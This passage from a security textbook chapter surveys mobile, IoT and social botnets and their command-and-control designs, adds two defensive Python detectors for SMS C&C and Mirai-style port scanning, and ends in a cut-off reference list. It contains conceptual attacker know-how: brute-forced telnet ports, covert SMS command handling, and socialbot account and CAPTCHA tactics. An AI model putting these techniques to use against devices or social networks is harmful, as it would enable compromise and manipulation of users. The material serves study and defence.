the battery life of mobile devices, which allows them to sustain heavy computation and
network demands.
Smartphones have become very popular in recent years. At the same time, a new
generation of malware that targets these devices has evolved and is becoming a major
threat to this technology. In most cases, this malware aims at constructing smartphone
botnets. A smartphone botnet is a group of compromised smartphones that are remotely
controlled by botmasters via C&C channels [44]. These botnets give attackers the
capability to perform many nefarious activities that greatly violate users' privacy.
These include, but are not limited to, installing new applications, requesting a URL
from the phone, sending spam, achieving financial gain by sending premium SMSs, making
phone calls, spying on users, and displaying ads and notifications. The main factors
that make smartphones (e.g., iPhones and Android-based phones) an attractive target for
attackers include:
■ High adoption rate of smartphones. With the emergence of mobile Internet access and
the proliferation of mobile applications, smartphones have seen significant
technological advancements. Smartphone prices have dropped significantly while sales
have increased sharply in recent years [45]. Sales are expected to increase further in
the coming years, especially in emerging markets. This provides a prolific environment
for hackers to construct mobile botnets.
■ Computational power of smartphones. Today's smartphones have computational power
and communication capabilities (in terms of memory, CPU, and transmission rate) that
outperform some generations of PCs. This makes them a very attractive target for
different types of nefarious activities, such as sending spam and performing DDoS
attacks.
■ Sensitive information available on smartphones. The private information that users
keep on their smartphones makes them a valuable target for attackers. A smartphone can
be viewed as a personal wallet that contains highly sensitive information, including
banking accounts, credit card numbers, personal pictures, phone calls, private
messages, GPS location, and access to the phone camera.
■ Smartphones can be easily infected by malware. Smartphone users tend to accept
downloads from untrusted sources. Attackers usually inject malicious code into mobile
applications before uploading them to the Android market.
■ Lack of security protection for smartphones. The security market for smartphones is
still immature, with a limited number of antimalware or antivirus products designed to
address smartphone vulnerabilities and detect malware. This means that malware
targeting smartphones goes undetected in most cases.
■ Internet connectivity. Smartphones are connected to the Internet most of the time,
either through WiFi networks or data services. Users tend to keep their smartphones
turned on with WiFi or the data connection enabled in order to stay connected and have
access to their favorite social networking applications.
■ C&C implementation. Mobile botnets in general, and smartphone botnets in
particular, offer new approaches to C&C implementation that were unavailable to
PC-based botnets. Instead of relying on traditional application layer protocols (e.g.,
HTTP, IRC, and file sharing applications), other techniques specific to mobile phone
technology can be used for the C&C implementation. These include the short messaging
service (SMS), push notification services available to mobile applications, short URL
services, and Bluetooth.
It is important to mention that there are some limitations on mobile botnet
construction. These limitations include: (i) Smartphones are battery-limited, which
requires botmasters to account for bot devices that are running out of power. This
affects the operation of the mobile botnet, especially when it is involved in activities
that require heavy processing and communication. If the battery of a device drains
faster than normal, the user may suspect that something is wrong with his or her phone.
(ii) Mobile botnets usually cause increased data usage or SMS traffic, leading to
additional billing costs. (iii) Smartphones are assigned private IP addresses rather
than public IP addresses, which restricts the creation of the C&C channel compared to
PC-based botnets.
The life cycle of mobile botnets is very similar to that of traditional PC-based
botnets in terms of the main stages described in Section 1.2. Also, a mobile botnet
architecture can be centralized or distributed (P2P), in the same way as traditional
botnets. However, there are major differences in the C&C channel implementation,
infection vectors, and approaches. This is due to the additional features available in
smartphones, such as Bluetooth, SMS, the GPS sensor, and notification services. Some
mobile botnets that appeared in the early period of mobile botnets used a conventional
HTTP-based C&C channel for communication. For example, the SymbOS.Yxes botnet appeared
in 2009 targeting the Symbian platform [46], the Ikee.B mobile botnet targeted
jailbroken iPhones in 2010 [47], and the GEINIMI mobile botnet is considered to be the
first Android botnet [48]. Subsequently, other techniques specific to mobile phones
were exploited to implement the C&C channel. ZeuS, for example, is an SMS-based botnet
that targets the Blackberry, Windows, and Symbian mobile platforms [49]. In addition,
public blogs were used to implement the C&C channel of an Android botnet called
AnserverBot in 2011 [50]. Advanced C&C architectures for mobile botnets were proposed
in [51]. These architectures leverage Tor hidden services and the DNS protocol to
obfuscate the attackers' identity and increase the botnet's resiliency.
20 ■ Botnet
1.5.1 Examples of Mobile Botnets
In this subsection, we describe SMS-based mobile botnets and cloud-based
push-styled mobile botnets. These two types are typical examples of mobile botnets
and of the C&C mechanisms they employ.
1.5.1.1 SMS-based Mobile Botnets
The design and implementation of an SMS-based smartphone botnet were presented
in [52]. In this type of botnet, commands are delivered to infected smartphones
(bots) via SMS without being noticed by the phone users. Each command is encoded
in a fixed-size text message. Bots read these messages, decode them, and execute the
commands according to a database that is known to the bot from the installation
phase. Using SMS messages for C&C provides more resilience and is considered
more suitable for smartphone botnets for several reasons: (1) It does not require
Internet connectivity. Even if the phone goes offline or moves outside a coverage
area, commands are buffered at the service center and delivered when the phone
becomes reachable. (2) SMS is a very popular service and among the most used data
applications in the world. (3) Smartphones usually have private IP addresses because
they connect through access points or cell towers. Therefore, SMS provides a suitable
mechanism for delivering commands to bots even when they are unreachable at their
private IP addresses. (4) It is difficult for a user to distinguish between SMS messages
related to botnet activity and ordinary spam SMS messages.
A unique passcode is hard-coded in the bot binary in order to identify each bot.
While it is possible to include a unique passcode for each bot, the design in [52]
suggested that each group of bots responsible for the same botnet activity (e.g.,
spam, ID theft, etc.) has the same passcode. The passcode hard-coded in a bot
binary is included in the SMS messages sent and received by that bot. To achieve
stealthy operation, a malicious Android application installed on each bot registers
itself as a background process so that it can send out SMS messages, be notified
when an SMS message is received, read received messages, decode them, and finally
delete them to avoid being noticed by the phone owner.
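The three traits just described (fixed-size messages, a shared hard-coded passcode, messages deleted before the owner sees them) are exactly what a handset-side monitor can look for. The following is an added defender-side example, not code from the chapter or from [52]; the pipe-separated log format, its field names and the sample numbers and message bodies are constructed for this example.

```python
"""Heuristic detector for SMS-borne C&C on a handset.

Added example; not code from the chapter or from [52]. It scores a constructed
SMS event log for the traits the text describes: commands arrive as fixed-size
messages, they carry a shared hard-coded group passcode, and the bot application
reads and deletes them before the owner notices. The log format and the field
names below are assumptions made for this example.
"""
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample log: "timestamp|event|peer number|message id|body".
# Messages from +15559999 are the ones a bot app would consume and hide.
SMS_LOG = [
    "1000.0|received|+15550001|m1|Lunch tomorrow?",
    "1003.0|received|+15559999|m2|QX7K4 01 A3F9C2D1",
    "1004.5|deleted|+15559999|m2|",
    "1100.0|received|+15550002|m3|Your package has shipped",
    "1200.0|received|+15559999|m4|QX7K4 02 9B1E77A0",
    "1201.2|deleted|+15559999|m4|",
    "1500.0|received|+15559999|m5|QX7K4 07 C0FFEE11",
    "1501.8|deleted|+15559999|m5|",
    "1600.0|sent|+15559999|m6|QX7K4 ACK C0FFEE11",
    "1700.0|received|+15550001|m7|ok see you at noon",
    "1800.0|deleted|+15550001|m1|",   # owner tidying up, far outside the window
]


@dataclass
class SmsEvent:
    ts: float
    kind: str    # "received", "sent" or "deleted"
    peer: str
    msg_id: str
    body: str


def parse_log(lines):
    """Parse the constructed pipe-separated log into SmsEvent records."""
    events = []
    for line in lines:
        ts, kind, peer, msg_id, body = line.split("|", 4)
        events.append(SmsEvent(float(ts), kind, peer, msg_id, body))
    return events


def quickly_deleted(events, window=10.0):
    """Ids of received messages deleted within `window` seconds of arrival.

    A person rarely reads and deletes a message that fast; a background bot
    process that must hide its commands does so every time.
    """
    received_at = {e.msg_id: e.ts for e in events if e.kind == "received"}
    return {
        e.msg_id for e in events
        if e.kind == "deleted"
        and e.msg_id in received_at
        and 0 <= e.ts - received_at[e.msg_id] <= window
    }


def shared_leading_token(bodies):
    """Return the first whitespace-delimited token if every body starts with it."""
    tokens = {b.split(" ", 1)[0] for b in bodies}
    return tokens.pop() if len(tokens) == 1 else None


def suspicious_peers(events, min_msgs=3, window=10.0):
    """Map peer number -> evidence for peers whose inbound SMS look like C&C.

    A peer is flagged when at least `min_msgs` messages arrived from it, all
    have the same length, all start with the same token (a candidate group
    passcode) and most were deleted within `window` seconds of arrival.
    """
    hidden = quickly_deleted(events, window)
    inbound = defaultdict(list)
    for e in events:
        if e.kind == "received":
            inbound[e.peer].append(e)
    findings = {}
    for peer, msgs in inbound.items():
        if len(msgs) < min_msgs:
            continue
        lengths = {len(m.body) for m in msgs}
        token = shared_leading_token([m.body for m in msgs])
        hidden_count = sum(1 for m in msgs if m.msg_id in hidden)
        if len(lengths) == 1 and token and hidden_count * 2 > len(msgs):
            findings[peer] = {
                "messages": len(msgs),
                "fixed_length": lengths.pop(),
                "token": token,
                "hidden": hidden_count,
            }
    return findings
```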
1.5.1.2 Cloud-Based Push-Styled Mobile Botnets
Cloud-based push-styled mobile botnets were presented in [53]. Push notification is
a service that is widely available on smartphone platforms. With this service, mobile
applications receive notification messages from their application servers through
push-based messaging servers hosted in the cloud. Push notification has several
advantages that make it an attractive feature on mobile phones. For example, the
application server does not need to periodically check whether the mobile device is
on or off. In addition, notifications reach mobile devices without the device having
to continuously poll the application servers. These features simplify mobile
application development and greatly reduce the workload on application servers.
This explains the popularity of the service on most smartphone platforms and,
in turn, why it can be utilized to implement C&C in mobile botnets.
A prototype of a cloud-based push-styled mobile botnet using the Google Cloud to
Device Messaging (C2DM) service for Android was presented in [53]. The main
idea is to disseminate botmaster commands to the bot population stealthily, as
part of the normal C2DM traffic. This means that there is no direct communication
between the botmaster and the bot devices; instead, communication between them
passes through the C2DM service. Implementing the C&C for such a botnet
involves a bot registration stage and a command dissemination stage. Although
C2DM has been officially deprecated, similar mechanisms, such as Google's Firebase
Cloud Messaging (FCM), can be used to construct cloud-based push-styled mobile
botnets.
1.6 IoT Botnets
IoT botnets, such as Mirai, QBot, BASHLITE, Hajime, and their variants, aim
to compromise weakly configured IoT devices that are connected to the Internet.
More recently, the Torii bot was discovered and is considered more sophisticated
than previously known IoT botnets [54]. IoT devices such as printers, DVRs,
network routers, IP cameras, and CCTV systems are distributed worldwide and are
meant to run all the time. Their manufacturers have focused on device functionality
and ease of installation to attract customers. In addition, many users leave the
default username and password shipped with the device unchanged. Mirai and other
IoT botnets exploit this simplicity and compromise hundreds of thousands of
devices using a dictionary of default usernames and passwords from different
vendors. The large number of compromised devices (victims) is orchestrated to
launch DDoS attacks against selected targets; it can also be used for spamming and
advertisement fraud. The IoT botnet architecture consists of four main components:
the bot, the C&C server, the loader, and the report server [55]. The role of each
component is described below:
1. The Bot: the malware that infects a vulnerable IoT device. It has two roles.
The first is to brute-force search for new victims to compromise; new victims are
IoT devices that are misconfigured, have software holes, or still use the default
username and password. Hence, it is important for system administrators to install
the most recent software patches, change passwords, and monitor their devices for
any abnormal behavior. The second role is to execute the commands sent by the
C&C server, such as a DDoS attack.
2. The C&C Server: controlled by the botmaster to send commands to the bots,
such as launching a DDoS attack. The botmaster is the person (hacker) who manages
the botnet and develops, modifies, and updates the bot programs and database.
A DDoS command includes the packet type (e.g., SYN flooding), the target address,
and the duration of the traffic.
3. The Loader: when a new IoT device is discovered and compromised by a bot,
the bot executes a command to determine the newly compromised device's
architecture and software. The new device is then directed to download the
corresponding botnet binary from the loader server, which holds binaries for
different device architectures, including ARM and Intel.
4. The Report Server: holds information on, and the status of, all the bots
(infected devices) in the botnet, including IP address, port number, device
architecture, and login credentials.
The threat of IoT botnets arises from the large number of infected devices, which is
on the order of hundreds of thousands. These devices can generate tremendous
network traffic when used to launch DDoS attacks. For example, a DDoS attack
on Krebs reached an unprecedented volume of more than 600 Gbps in 2016 [56].
Researchers have shown that the Mirai botnet infected more than 65,000 IoT
devices in nearly 20 hours, and that the number later grew to 300,000 devices [57].
This number is likely to increase as the use of IoT devices grows; more than one
hundred billion devices are expected by 2030 [58], unless effective countermeasures
are developed and deployed.
The infection process is based on a brute-force search for devices with default
usernames and passwords, using a remote connection (telnet) on standard open
ports. TCP ports 23, 2323, 7547, 5555, 23231, 37777, 6789, 22, 2222, 32, and
19058 are the most popular ones [59]. Furthermore, most UDP ports are targeted by
compromised IoT devices; among the top targeted UDP ports are 37547, 137, 53413,
37547, 32124, and 28183 [60]. The target IP addresses are randomly generated. After
a successful connection to an IoT device, the botnet closes the open ports to prevent
other botnets from connecting to the device. Default usernames and passwords, along
with simple passwords (such as 123456), are hard-coded into the IoT botnet scripts.
The IoT botnet resides in the memory of the compromised device, so a restart or
power-off of the device removes it. However, this is difficult for system or network
administrators to do. For example, if the infected devices are routers, the network
will be interrupted while the routers are powered off and on again. This action can
also violate the service level agreement (SLA) of high-availability services.
The release of the Mirai source code made it possible for researchers to understand
the behavior of IoT botnets. This behavior is common to the IoT botnets discovered
since, although some of them are more advanced than the original Mirai. Defining
policies and rules that detect and capture compromised devices can help fight the
spread of IoT botnets; access, communication, and usage policies are among the
desired definitions [61]. Moreover, smarter methods based on machine learning
algorithms can be developed to efficiently detect compromised IoT devices and alert
system administrators so they can isolate the devices from the network, or block
them automatically. For example, N-BaIoT is a method that uses deep learning for
anomaly detection in network traffic [62]. On the other hand, a method called
AutoBotCatcher relies on the idea of mutual entities in the botnet community: bots
communicate with a C&C server, which makes the C&C server a mutual entity [58].
Based on the identified botnet communities, AutoBotCatcher can be utilized by ISPs
and network administrators to further investigate suspicious devices. In addition,
measures such as encrypting IoT device memory and data, easy and automated
techniques for changing device passwords, using passwords different from those
shipped from the factory, restricting access to ports on the devices, and updating
device firmware with the latest patches are among the effective practices that prevent
the spread of IoT botnets [63].
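Both the scanning behaviour described in the infection process and the AutoBotCatcher notion of a mutual entity can be checked against ordinary flow records. The following added example (not code from the chapter, from Mirai, or from [58]) does both over constructed flows; the simplified "ts src dst dport proto" record format, the internal address prefix and the allowlist of benign ports are assumptions made for this example.

```python
"""Flow-log analytics for two IoT-botnet behaviours described in this section.

Added example; not code from the chapter, Mirai or the AutoBotCatcher paper [58].
It flags (1) Mirai-style brute-force scanning, one source opening connections on
the telnet-style TCP ports listed in the text to many randomly chosen hosts, and
(2) a "mutual entity" in the AutoBotCatcher sense: one endpoint that many
internal devices all talk to, as they would with a C&C server. The flow format,
the internal prefix and the benign-port allowlist are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass

# TCP ports the text cites as the most popular brute-force targets [59].
BRUTE_FORCE_TCP_PORTS = {23, 2323, 7547, 5555, 23231, 37777, 6789, 22, 2222, 32, 19058}

# Constructed sample flows. 10.0.0.5-10.0.0.8 are "infected" cameras that all
# report to 198.51.100.9:6667 (a constructed C&C endpoint); 10.0.0.5 also
# sweeps telnet ports across random-looking addresses in 203.0.113.0/24.
FLOW_LOG = [
    "100.0 10.0.0.2 93.184.216.34 443 tcp",
    "101.0 10.0.0.3 93.184.216.34 443 tcp",
    "102.0 10.0.0.5 198.51.100.9 6667 tcp",
    "103.0 10.0.0.6 198.51.100.9 6667 tcp",
    "104.0 10.0.0.7 198.51.100.9 6667 tcp",
    "105.0 10.0.0.8 198.51.100.9 6667 tcp",
    "106.0 10.0.0.2 10.0.0.1 53 udp",
    "107.0 10.0.0.3 10.0.0.1 53 udp",
    "108.0 10.0.0.5 10.0.0.1 53 udp",
] + [
    f"{110 + i * 0.5:.1f} 10.0.0.5 203.0.113.{(i * 37) % 251 + 1} "
    f"{23 if i % 2 else 2323} tcp"
    for i in range(12)
]


@dataclass
class Flow:
    ts: float
    src: str
    dst: str
    dport: int
    proto: str


def parse_flows(lines):
    """Parse the constructed whitespace-separated flow records."""
    flows = []
    for line in lines:
        ts, src, dst, dport, proto = line.split()
        flows.append(Flow(float(ts), src, dst, int(dport), proto))
    return flows


def scanning_sources(flows, min_targets=8, window=60.0):
    """Map source -> most distinct hosts it probed on brute-force ports within
    any `window` seconds, for sources that reach `min_targets`.

    A camera or DVR has no reason to open telnet sessions to many unrelated
    addresses; that pattern is the bot's first role (hunting new victims).
    """
    per_src = defaultdict(list)
    for f in flows:
        if f.proto == "tcp" and f.dport in BRUTE_FORCE_TCP_PORTS:
            per_src[f.src].append((f.ts, f.dst))
    hits = {}
    for src, attempts in per_src.items():
        attempts.sort()
        best, lo = 0, 0
        for hi in range(len(attempts)):
            while attempts[hi][0] - attempts[lo][0] > window:
                lo += 1
            best = max(best, len({dst for _, dst in attempts[lo:hi + 1]}))
        if best >= min_targets:
            hits[src] = best
    return hits


def mutual_entities(flows, internal_prefix="10.0.0.", min_members=3,
                    benign_ports=frozenset({53, 123, 443})):
    """Map (dst, dport) -> sorted internal sources for endpoints shared by at
    least `min_members` internal devices, skipping ports every device uses
    legitimately (DNS, NTP, HTTPS: an assumed allowlist, tune it per network).

    The result is a candidate botnet community and its mutual entity; as the
    text notes, it is input for further investigation, not proof by itself.
    """
    members = defaultdict(set)
    for f in flows:
        if f.src.startswith(internal_prefix) and f.dport not in benign_ports:
            members[(f.dst, f.dport)].add(f.src)
    return {
        endpoint: sorted(srcs)
        for endpoint, srcs in members.items()
        if len(srcs) >= min_members
    }
```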
1.7 Social Botnets
Socialbots are autonomous software programs that target online social networks
(OSNs) such as Facebook and Twitter. These programs mimic the behavior of real
(human) users by posting comments (or tweets), re-posting messages that others
have posted, sending connection requests, accepting requests from others, following
others, and so on. Socialbots pursue mainly three objectives. The first is to launch
campaigns that promote certain opinions or ideas in a community of users and make
certain topics popular. The second is to collect data, especially private user
information; this information becomes available once a user accepts a connection
request from the socialbot. The third is to alter the graph structure of OSNs, which
produces fake or misleading patterns in the social network graph (vertices and
edges). Boshmaf et al. showed that today's OSNs are vulnerable to socialbots through
experiments on the Facebook OSN [64]. In addition, Freitas et al. conducted socialbot
experiments on the Twitter OSN and showed that socialbots can infiltrate Twitter [65].
1.7.1 Operation
The following are the typical steps carried out by socialbot developers to infiltrate
OSNs.
1. Automatic creation of email accounts, as most OSNs require an email address for
verification. Hence, an adversary relies on email providers that allow an unlimited
number of email accounts. Some adversaries might choose to create the email
accounts manually.
2. Handling CAPTCHAs, as most OSNs rely on that technique to validate users.
Socialbots use different methods to break CAPTCHAs in order to automate the
infiltration of OSNs, especially for large-scale attacks. For example, socialbot
developers use script identification or optical character recognition, utilize botnets
that ask users to solve CAPTCHAs, or rely on cheap-labor CAPTCHA-breaking
businesses [64,66,67].
3. Creating a profile for the accounts, including a job title and a picture. This is
very important for increasing attractiveness. For example, a person with a
professional career attracts users. In addition, a good-looking picture has the
greatest impact, as described in [64]. Female profiles have a higher infiltration
success rate than male profiles; however, both achieve similar acceptance rates if
they have a high number of friends (contacts).
Socialbot developers randomize their behavior when performing activities (i.e.,
posts, requests, follow-backs, etc.) in order to avoid detection, as in the Realboy
project by Zack Coburn and Greg Marra [68].
Some methods use social network honeypots to trap adversaries. These methods
generate artificial profiles, monitor them, and analyze their activities [69]. Designing
and collecting OSN datasets can help in developing intelligent techniques that rely
on anomalous behavior to detect socialbots [70]. Machine learning, classification,
and artificial intelligence techniques have been developed to detect and isolate
socialbots from OSNs [71–73]. However, more robust and sophisticated methods are
still needed to detect non-trivial socialbot behaviors.
1.8 Conclusion
Botnets are among the top cyber security issues on today's Internet. They have
undergone major advances in recent years in terms of their architectures, attack
activities, and types. The enormous growth and expansion of the Internet in recent
years has contributed greatly to the development of a new generation of botnets that
leverage the vulnerabilities of the new protocols, applications, and devices that
compose the Internet. The nature and scale of botnet attacks have increased over
time. Traditionally, botnets have been used to conduct various forms of DDoS
attacks, email spam campaigns, click fraud, and identity theft. Recently, botnets have
been used for new malicious activities, including malware distribution, fast-flux
network services, social campaigns, and digital currency mining. Over the past fifteen
years, a significant amount of research has been done in this area, focusing on botnet
characterization and detection.
This chapter provided a detailed discussion of botnets and their main
characteristics. It began by describing the main steps of the botnet life cycle and
highlighting the main characteristics, which include botnet size, geographical
distribution, and spatial-temporal correlation. The strength and resilience of any
botnet depend on the implementation of its C&C channel. Centralized and P2P
botnets were discussed as the two main architectures for botnet communication
topology. This covered traditional PC-based botnets, mobile botnets, IoT botnets,
and social botnets. For each type of botnet, the main features were highlighted and
the C&C implementation methods were discussed. Overall, this chapter provided
a comprehensive review of botnets, their key features, the differences between botnet
types, and their C&C implementations. Future research in this field is expected to
focus on efficient techniques for botnet detection, while taking into consideration
the new types of botnets that have emerged in recent years and the new techniques
used to implement stealthy and resilient C&C.
References
[1] Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, and Andreas Terzis. A multi-faceted
approach to understanding the botnet phenomenon. In Proceedings of the
6th ACM SIGCOMM Conference on Internet Measurement, IMC ’06, pages 41–52,
New York, NY, USA, 2006. ACM.
[2] T. Holz. A short visit to the bot zoo [malicious bots software]. IEEE Security
Privacy, 3(3):76–79, May 2005.
[3] D. Geer. Malicious bots threaten network security. Computer, 38(1):18–20, Jan
2005.
[4] B. McCarty. Botnets: Big and bigger. IEEE Security Privacy, 99(4):87–90, Jul 2003.
[5] G. P. Schaffer. Worms and viruses and botnets, oh my! rational responses to
emerging internet threats. IEEE Security Privacy, 4(3):52–58, May 2006.
[6] Keman Huang, Michael Siegel, and Stuart Madnick. Systematically understanding
the cyber attack business: A survey. ACM Computing Surveys, 51(4):1–70:36, Jul
2018.
[7] Europol and NATO Strategic Directions South NSDS. In Internet Organised Crime
Threat Assessment (IOCTA 2017). European Union Agency for Law Enforcement
Cooperation (Europol), 2017.
[8] Ayesha Binte Ashfaq, Zainab Abaid, Maliha Ismail, Muhammad Umar Aslam,
Affan A Syed, and Syed Ali Khayam. Diagnosing bot infections using bayesian
inference. Journal of Computer Virology and Hacking Techniques, 14(1):21–28,
2018.
[9] Shui Yu, Guofei Gu, Ahmed Barnawi, Song Guo, and Ivan Stojmenovic. Malware
propagation in large-scale networks. IEEE Transactions on Knowledge and Data
Engineering, 27(1):170–179, 2015.
[10] Terry Nelms, Roberto Perdisci, Manos Antonakakis, and Mustaque Ahamad.
Towards measuring and mitigating social engineering software download attacks.
In USENIX Security Symposium, pages 773–789, 2016.
[11] Francois Mouton, Louise Leenen, and Hein S. Venter. Social engineering attack
examples, templates and scenarios. Computers & Security, 59:186–209, 2016.
[12] Amir Javed, Pete Burnap, and Omer Rana. Prediction of drive-by download attacks
on twitter. Information Processing & Management, 2018.
[13] Antonio Nappa, M. Zubair Rafique, and Juan Caballero. The malicia dataset:
Identification and analysis of drive-by download operations. International Journal
of Information Security, 14(1):15–33, 2015.
[14] Guofei Gu, Junjie Zhang, and Wenke Lee. Botsniffer: Detecting botnet command
and control channels in network traffic. In Proceedings of the 15th Annual Network
and Distributed System Security Symposium (NDSS’08), Feb 2008.
[15] An Wang, Wentao Chang, Songqing Chen, and Aziz Mohaisen. Delving into
internet ddos attacks by botnets: Characterization and analysis. IEEE/ACM
Transactions on Networking, 26(6):2843–2855, 2018.
[16] Aditya K Sood, Sherali Zeadally, and Richard J Enbody. An empirical study of
http-based financial botnets. IEEE Transactions on Dependable and Secure
Computing, 13(2):236–251, 2016.
[17] Son Dinh, Taher Azeb, Francis Fortin, Djedjiga Mouheb, and Mourad Debbabi.
Spam campaign detection, analysis, and investigation. Digital Investigation,
12:S12–S21, 2015.
[18] Paul Barford and Vinod Yegneswaran. An inside look at botnets. In Mihai
Christodorescu, Somesh Jha, Douglas Maughan, Dawn Song, and Cliff Wang, editors,
Malware Detection, pages 171–191, Boston, MA, 2007. Springer US.
[19] Anirudh Ramachandran and Nick Feamster. Understanding the network-level
behavior of spammers. SIGCOMM Computer Communication Review,
36(4):291–302, Aug 2006.
[20] Expert: Botnets no. 1 emerging internet threat. www.cnn.com/2006/tech/internet/
01/31/furst, Access Date: January 2019.
[21] Evan Cooke, Farnam Jahanian, and Danny McPherson. The zombie roundup:
Understanding, detecting, and disrupting botnets. In Proceedings of the Steps to
Reducing Unwanted Traffic on the Internet on Steps to Reducing Unwanted Traffic on
the Internet Workshop, SRUTI’05, pages 6–6, Berkeley, CA, USA, 2005. USENIX
Association.
[22] M. Patrick Collins, Timothy J. Shimeall, Sidney Faber, Jeff Janies, Rhiannon
Weaver, Markus De Shon, and Joseph Kadane. Using uncleanliness to predict
future botnet addresses. In Proceedings of the 7th ACM SIGCOMM Conference on
Internet Measurement, IMC ’07, pages 93–104, New York, NY, USA, 2007. ACM.
[23] Z. Chen, C. Ji, and P. Barford. Spatial-temporal characteristics of internet malicious
sources. In IEEE INFOCOM 2008 - The 27th Conference on Computer
Communications, pages 2306–2314, Apr 2008.
[24] D. Dagon, G. Gu, C. P. Lee, and W. Lee. A taxonomy of botnet structures. In
Twenty-Third Annual Computer Security Applications Conference (ACSAC 2007),
pages 325–339, Dec 2007.
[25] Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, and Andreas Terzis. My botnet is
bigger than yours (maybe, better than yours): Why size estimates remain
challenging. In Proceedings of the First Conference on First Workshop on Hot Topics
in Understanding Botnets, HotBots’07, pages 5–5, Berkeley, CA, USA, 2007.
USENIX Association.
[26] David Dagon, Cliff Zou, and Wenke Lee. Modeling botnet propagation using time
zones. In Proceedings of the 13th Network and Distributed System Security Symposium
NDSS, 2006.
[27] C. C. Zou and R. Cunningham. Honeypot-aware advanced botnet construction
and maintenance. In International Conference on Dependable Systems and Networks
(DSN’06), pages 199–208, Jun 2006.
[28] Zakir Durumeric, Eric Wustrow, and J. Alex Halderman. ZMap: Fast internet-wide
scanning and its security applications. In Presented as part of the 22nd USENIX
Security Symposium (USENIX Security 13), pages 605–620, Washington, DC, 2013.
USENIX.
[29] F. Soldo, K. El Defrawy, A. Markopoulou, B. Krishnamurthy, and J. van der
Merwe. Filtering sources of unwanted traffic. In 2008 Information Theory and
Applications Workshop, pages 199–208, Jan 2008.
[30] Zisis Tsiatsikas, Marios Anagnostopoulos, Georgios Kambourakis, Sozon Lambrou,
and Dimitris Geneiatakis. Hidden in plain sight. sdp-based covert channel for
botnet communication. In International Conference on Trust and Privacy in Digital
Business, pages 48–59, 2015. Springer.
[31] Zisis Tsiatsikas, Georgios Kambourakis, Dimitris Geneiatakis, and Hua Wang. The
devil is in the detail: Sdp-driven malformed message attacks and mitigation in sip
ecosystems. IEEE Access, 7:2401–2417, 2019.
[32] K. Singh, A. Srivastava, J. Giffin, and W. Lee. Evaluating emails feasibility for
botnet command and control. In 2008 IEEE International Conference on Dependable
Systems and Networks With FTCS and DCC (DSN), pages 376–385, Jun 2008.
[33] J. Zhang, R. Perdisci, W. Lee, X. Luo, and U. Sarfraz. Building a scalable system for
stealthy p2p-botnet detection. IEEE Transactions on Information Forensics and
Security, 9(1):27–38, Jan 2014.
[34] Babak Rahbarinia, Roberto Perdisci, Andrea Lanzi, and Kang Li. Peerrush: Mining
for unwanted p2p traffic. Journal of Information Security and Applications,
19(3):194–208, 2014.
[35] Rafael A. Rodríguez-Gómez, Gabriel Maciá-Fernández, Pedro García-Teodoro,
Moritz Steiner, and Davide Balzarotti. Resource monitoring for the detection of
parasite p2p botnets. Computer Networks, 70:302–311, 2014.
[36] Christian Rossow, Dennis Andriesse, Tillmann Werner, Brett Stone-Gross,
Daniel Plohmann, Christian J. Dietrich, and Herbert Bos. P2PWNED: Modeling
and Evaluating the Resilience of Peer-to-Peer Botnets. In Proceedings of the 34th
IEEE Symposium on Security and Privacy (S&P), San Francisco, CA, May 2013.
[37] Thorsten Holz, Moritz Steiner, Frederic Dahl, Ernst Biersack, and Felix C Freiling.
Measurements and mitigation of peer-to-peer-based botnets: A case study on storm
worm. LEET, 8(1):1–9, 2008.
[38] Nicolas Falliere. Sality: Story of a peer-to-peer viral network. Rapport technique,
Symantec Corporation, 32, 2011.
[39] Joan Calvet, Carlton R Davis, and Pierre-Marc Bureau. Malware authors don’t
learn, and that’s good! In 2009 4th International Conference on Malicious and
Unwanted Software (MALWARE), pages 88–97, 2009, IEEE.
[40] Max Kerkers, José Jair Santanna, and Anna Sperotto. Characterisation of the
Kelihos.B botnet. In IFIP International Conference on Autonomous Infrastructure,
Management and Security, pages 79–91, 2014, Springer.
[41] Daniel Plohmann and Elmar Gerhards-Padilla. Case study of the miner botnet. In
2012 4th International Conference on Cyber Conflict (CYCON), pages 1–16, 2012,
IEEE.
[42] Hamad Binsalleeh, Thomas Ormerod, Amine Boukhtouta, Prosenjit Sinha,
Amr Youssef, Mourad Debbabi, and Lingyu Wang. On the analysis of the zeus
botnet crimeware toolkit. In 2010 Eighth Annual International Conference on Privacy
Security and Trust (PST), pages 31–38, 2010, IEEE.
[43] The zeroaccess rootkit. https://nakedsecurity.sophos.com/zeroaccess/, Access Date:
January 2019.
[44] Marios Anagnostopoulos, Georgios Kambourakis, and Stefanos Gritzalis. New
facets of mobile botnet: Architecture and evaluation. International Journal of
Information Security, 15(5):455–473, Oct 2016.
[45] José Martins, Catarina Costa, Tiago Oliveira, Ramiro Gonçalves, and Frederico Branco.
How smartphone advertising influences consumers’ purchase intention. Journal of
Business Research, 94:378–387, 2019.
[46] Axelle Apvrille. Symbian worm yxes: Towards mobile botnets? Journal in Computer
Virology, 8(4):117–131, Nov 2012.
[47] Phillip Porras, Hassen Saïdi, and Vinod Yegneswaran. An analysis of the ikee.b
iphone botnet. In Andreas U. Schmidt, Giovanni Russello, Antonio Lioy, Neeli
R. Prasad, and Shiguo Lian, editors, Security and Privacy in Mobile Information and
Communication Systems, pages 141–152, Berlin, Heidelberg, 2010. Springer Berlin
Heidelberg.
[48] X. Wei, L. Gomez, I. Neamtiu, and M. Faloutsos. Malicious android applications in
the enterprise: What do they do and how do we fix it? In 2012 IEEE 28th
International Conference on Data Engineering Workshops, pages 251–254, Apr 2012.
[49] N. Etaher, G. R. S. Weir, and M. Alazab. From zeus to zitmo: Trends in banking
malware. In 2015 IEEE Trustcom/BigDataSE/ISPA, volume 1, pages 1386–1391,
Aug 2015.
[50] Y. Zhou and X. Jiang. An analysis of the anserverbot trojan. technical report, 2011.
[51] Marios Anagnostopoulos, Georgios Kambourakis, Panagiotis Drakatos, Michail
Karavolos, Sarantis Kotsilitis, and David KY Yau. Botnet command and control
architectures revisited: Tor hidden services and fluxing. In International Conference on
Web Information Systems Engineering, pages 517–527, 2017, Springer.
[52] Yuanyuan Zeng, Kang G. Shin, and Xin Hu. Design of sms
commanded-and-controlled and p2p-structured mobile botnets. In Proceedings of the Fifth ACM
Conference on Security and Privacy in Wireless and Mobile Networks, WISEC ’12,
pages 137–148, New York, NY, USA, 2012. ACM.
[53] Shuang Zhao, Patrick P. C. Lee, John C. S. Lui, Xiaohong Guan, Xiaobo Ma, and
